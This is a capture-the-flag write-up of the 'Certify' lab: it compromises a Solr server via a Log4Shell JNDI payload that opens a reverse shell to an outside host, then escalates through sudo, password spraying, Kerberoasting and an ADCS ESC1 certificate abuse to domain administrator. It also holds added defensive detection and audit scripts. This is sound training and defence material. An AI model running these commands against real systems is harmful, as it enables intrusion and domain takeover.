春秋云镜 - Certify - Writeup


Port 8983 is running Solr.


Try Log4j (Log4Shell) against it:

http://39.98.127.209:8983/solr/admin/info?d=${jndi:${jndi:ldap://42.192.42.48:1389/Basic/ReverseShell/42.192.42.48/7777}}
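From the defender's side, the request above is exactly what should light up in the Solr access log. The following is an added example (not part of the original writeup) that scans constructed combined-format log lines for JNDI lookups, percent-decoding first and matching the lookup even when it is nested inside another `${...}` as in the payload above. The sample lines, client addresses and callback hosts (documentation ranges) are all made up for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (not from the original writeup);
# 203.0.113.0/24 and 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:19:50:33 +0800] "GET /solr/admin/info?d=${jndi:${jndi:ldap://203.0.113.10:1389/Basic/ReverseShell/203.0.113.10/7777}} HTTP/1.1" 200 512
10.0.0.6 - - [10/Oct/2023:19:51:01 +0800] "GET /solr/admin/info/system?wt=json HTTP/1.1" 200 2048
10.0.0.7 - - [10/Oct/2023:19:52:10 +0800] "GET /solr/select?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fa%7D HTTP/1.1" 400 128
"""

# Structured form: ${jndi:<scheme>://<host>[:<port>]...}. The scan runs over the whole
# decoded line, so a lookup nested inside another ${...} (first sample line) is still
# matched at its innermost position.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z0-9+.-]+)\s*:\s*//\s*(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)
# Loose form: still raise a finding when the scheme/host part is not parseable.
JNDI_LOOSE_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text, rounds=3):
    """Percent-decode repeatedly; payloads are often encoded one or more times."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan_line(line):
    """Return a list of JNDI lookup hits found in one log line."""
    text = normalize(line)
    hits = [
        {"scheme": m["scheme"].lower(), "host": m["host"],
         "port": int(m["port"]) if m["port"] else None}
        for m in JNDI_RE.finditer(text)
    ]
    if not hits and JNDI_LOOSE_RE.search(text):
        hits.append({"scheme": None, "host": None, "port": None})
    return hits


def scan_log(log_text):
    """Scan every line; each finding carries the client address from the log line."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for hit in scan_line(line):
            findings.append({"line": lineno, "client": line.split(" ", 1)[0], **hit})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The extracted `host`/`port` pair is the callback the vulnerable JVM would have contacted, which is the value to pivot on in egress logs and to block at the perimeter; the `client` field is the source to triage.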

Privilege escalation via sudo:

sudo grc --pty /bin/sh


The first flag is in /root/flag.

Run fscan against the internal network:

172.22.9.19 (already compromised)
172.22.9.7  DC XIAORANG\XIAORANG-DC ADCS
172.22.9.47 Windows 6.1
172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab

172.22.9.47:139 open
172.22.9.47:22 open
172.22.9.19:80 open
172.22.9.19:22 open
172.22.9.26:445 open
172.22.9.47:445 open
172.22.9.7:445 open
172.22.9.7:139 open
172.22.9.26:139 open
172.22.9.26:135 open
172.22.9.7:135 open
172.22.9.7:80 open
172.22.9.47:80 open
172.22.9.47:21 open
172.22.9.19:8983 open
172.22.9.7:88 open

proxychains4 cme smb 172.22.9.7 172.22.9.47 -u '' -p '' --shares


On 172.22.9.47 the fileshare share grants READ and WRITE access.


The second flag is there.

It also comes with a hint:

Yes, you have enumerated smb. But do you know what an SPN is?

The SMB share also contains a personal.db.


It holds a pile of names, and also four passwords.


First enumerate valid usernames through Kerberos with kerbrute:

proxychains4 kerbrute userenum --dc 172.22.9.7 -d xiaorang.lab username.txt


That yields 91 valid usernames; next, spray the four passwords against them:

proxychains4 -q kerbrute passwordspray --dc 172.22.9.7 -d xiaorang.lab username.txt admin
proxychains4 -q kerbrute passwordspray --dc 172.22.9.7 -d xiaorang.lab username.txt i9XDE02pLVf
.....

Two accounts come back:

zhangjian@xiaorang.lab:i9XDE02pLVf
liupeng@xiaorang.lab:fiAzGwEMgTY

Following the hint, enumerate SPNs and request service tickets:

proxychains4 -q GetUserSPNs.py -dc-ip 172.22.9.7 'xiaorang.lab/zhangjian:i9XDE02pLVf' -request
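Both the password spray above and the SPN ticket request leave a distinctive trail on the domain controller: the spray produces a burst of Kerberos pre-authentication failures (event 4771, status 0x18) for many different accounts from one source address, and the SPN request produces a burst of service-ticket requests (event 4769) with RC4 encryption (0x17) for many service accounts by one user. The following is an added example (not from the original writeup) that runs both detections over constructed events; the usernames, addresses, thresholds and windows are assumptions chosen for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"        # 4769 TicketEncryptionType for an RC4-HMAC service ticket
PREAUTH_FAILED = "0x18"  # 4771 Status: KDC_ERR_PREAUTH_FAILED (wrong password)


def make_events():
    """Constructed Windows Security events (field names as in 4771/4769); not real telemetry."""
    t0 = datetime(2023, 10, 10, 21, 13, 0)
    ev = []
    # One source failing pre-auth for 12 different accounts within two minutes (spray shape).
    for i in range(12):
        ev.append({"EventID": 4771, "Time": t0 + timedelta(seconds=10 * i),
                   "TargetUserName": f"user{i:02d}", "IpAddress": "::ffff:10.0.0.50",
                   "Status": PREAUTH_FAILED})
    # Benign: one person mistyping a password twice from a workstation.
    for s in (60, 80):
        ev.append({"EventID": 4771, "Time": t0 + timedelta(seconds=s),
                   "TargetUserName": "alice", "IpAddress": "::ffff:10.0.0.21",
                   "Status": PREAUTH_FAILED})
    # One account requesting RC4 service tickets for six service accounts in 30 seconds.
    for i, svc in enumerate(["svc_sql", "svc_web", "svc_backup", "svc_ftp", "svc_mail", "svc_print"]):
        ev.append({"EventID": 4769, "Time": t0 + timedelta(minutes=10, seconds=5 * i),
                   "TargetUserName": "jdoe@CORP.EXAMPLE", "ServiceName": svc,
                   "TicketEncryptionType": RC4_HMAC, "IpAddress": "::ffff:10.0.0.50"})
    # Benign: AES ticket for a file server's machine account.
    ev.append({"EventID": 4769, "Time": t0 + timedelta(minutes=10),
               "TargetUserName": "bob@CORP.EXAMPLE", "ServiceName": "FILESRV01$",
               "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.22"})
    return ev


def _burst(items, window, threshold):
    """items: list of (time, value). Return (start, count) for the window starting at an
    item with the most distinct values, or None if no window reaches the threshold."""
    items = sorted(items)
    best = None
    for i, (start, _) in enumerate(items):
        distinct = {v for t, v in items[i:] if t - start <= window}
        if len(distinct) >= threshold and (best is None or len(distinct) > best[1]):
            best = (start, len(distinct))
    return best


def detect_password_spray(events, threshold=10, window=timedelta(minutes=5)):
    """Many distinct accounts failing pre-auth from one source address in a short window."""
    by_src = defaultdict(list)
    for e in events:
        if e["EventID"] == 4771 and e.get("Status") == PREAUTH_FAILED:
            by_src[e["IpAddress"]].append((e["Time"], e["TargetUserName"].lower()))
    alerts = []
    for src, items in by_src.items():
        hit = _burst(items, window, threshold)
        if hit:
            alerts.append({"rule": "password_spray", "source": src,
                           "start": hit[0], "distinct_users": hit[1]})
    return alerts


def detect_kerberoast(events, threshold=5, window=timedelta(minutes=5)):
    """One account pulling RC4 service tickets for many distinct user-account SPNs."""
    by_user = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769 or e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        # Machine accounts and krbtgt are skipped: roasting targets user accounts with SPNs.
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_user[e["TargetUserName"].lower()].append((e["Time"], svc.lower()))
    alerts = []
    for user, items in by_user.items():
        hit = _burst(items, window, threshold)
        if hit:
            alerts.append({"rule": "kerberoast", "account": user,
                           "start": hit[0], "distinct_services": hit[1]})
    return alerts


if __name__ == "__main__":
    events = make_events()
    for alert in detect_password_spray(events) + detect_kerberoast(events):
        print(alert)
```

The thresholds are deliberately coarse; in a real estate they are tuned per source population, and the RC4 filter only works as a signal if service accounts are configured for AES, which is also the mitigation that makes the cracked hashes above far more expensive to recover.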


Crack the ticket hashes with hashcat.


Recovered:

zhangxia MyPass2@@6
chenchen @Passw0rd@

This environment has ADCS deployed.


Enumerate certificate templates:

proxychains4 -q certipy find -u "zhangxia@xiaorang.lab" -p 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout
Certipy v4.8.0 - by Oliver Lyak (ly4k)


Exploit ESC1: use the XR Manager certificate template to request a certificate for the domain administrator.

proxychains4 -q certipy req -u "zhangxia@xiaorang.lab" -p 'MyPass2@@6' -dc-ip 172.22.9.7 -target 172.22.9.7 -ca 'xiaorang-XIAORANG-DC-CA' -template 'XR Manager' -upn 'administrator@xiaorang.lab'
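The request above only works because the template satisfies every ESC1 condition at once: the enrollee may supply the subject, no manager approval or authorized signature gates issuance, the EKU permits authentication, and a low-privileged principal holds Enroll rights. The following is an added example (not from the original writeup or from Certipy) that audits a template record for exactly those conditions and shows one remediation. The template name and SIDs are constructed, and `enroll_sids` is a simplified stand-in for the Enroll ACEs that a real audit would read from nTSecurityDescriptor.

```python
from copy import deepcopy

# Well-known bit flags as stored on a template object in AD.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # in msPKI-Enrollment-Flag (manager approval)

# EKUs that let a certificate authenticate a principal (an empty EKU list means any purpose).
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "2.5.29.37.0": "Any Purpose",
}

# Principals that essentially every domain account belongs to.
WELL_KNOWN_LOW_PRIV = {"S-1-1-0": "Everyone", "S-1-5-11": "Authenticated Users"}
LOW_PRIV_RIDS = {"513": "Domain Users", "515": "Domain Computers"}


def principal_name(sid):
    """Name of a low-privileged principal, or None if the SID is not one."""
    if sid in WELL_KNOWN_LOW_PRIV:
        return WELL_KNOWN_LOW_PRIV[sid]
    return LOW_PRIV_RIDS.get(sid.rsplit("-", 1)[-1])


def check_esc1(template):
    """Return a finding dict if the template meets all ESC1 conditions, else None."""
    if not template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        return None  # requester cannot choose the subject / SAN
    if template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        return None  # issuance waits for a certificate manager
    if template["msPKI-RA-Signature"] > 0:
        return None  # an enrollment-agent signature is required
    ekus = template["pKIExtendedKeyUsage"]
    auth_ekus = [AUTH_EKUS[o] for o in ekus if o in AUTH_EKUS] if ekus else ["(no EKU: any purpose)"]
    if not auth_ekus:
        return None  # e.g. only Server Authentication or Code Signing
    low_priv = [principal_name(s) for s in template["enroll_sids"] if principal_name(s)]
    if not low_priv:
        return None
    return {
        "template": template["name"],
        "auth_ekus": auth_ekus,
        "low_priv_enrollers": low_priv,
        "fix": ["clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT or require manager approval",
                "remove Enroll rights for " + ", ".join(low_priv),
                "unpublish the template from the CA if it is unused"],
    }


def require_manager_approval(template):
    """One remediation: a copy of the template with manager approval turned on."""
    fixed = deepcopy(template)
    fixed["msPKI-Enrollment-Flag"] |= CT_FLAG_PEND_ALL_REQUESTS
    return fixed


# Constructed template record (hypothetical name and domain SID) shaped like an ESC1 template.
VULN_TEMPLATE = {
    "name": "Example Manager",
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enroll_sids": ["S-1-5-21-1111111111-2222222222-3333333333-513"],
}

if __name__ == "__main__":
    print(check_esc1(VULN_TEMPLATE))
    print(check_esc1(require_manager_approval(VULN_TEMPLATE)))
```

Any one of the early returns is enough to break the chain, which is why the usual fixes are to clear the enrollee-supplies-subject flag on templates that do not need it, or to turn on manager approval for the ones that do, and to keep Enroll rights off broad groups such as Domain Users.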


Use the certificate to obtain a TGT:

proxychains4 -q certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7


Move laterally to the two remaining machines with the ticket and collect the last two flags:

export KRB5CCNAME=administrator.ccache

proxychains4 -q psexec.py -no-pass -k xiaorang.lab/Administrator@xiaorang-dc.xiaorang.lab -dc-ip 172.22.9.7

proxychains4 -q psexec.py -no-pass -k xiaorang.lab/Administrator@DESKTOP-CBKTVMO.xiaorang.lab -dc-ip 172.22.9.7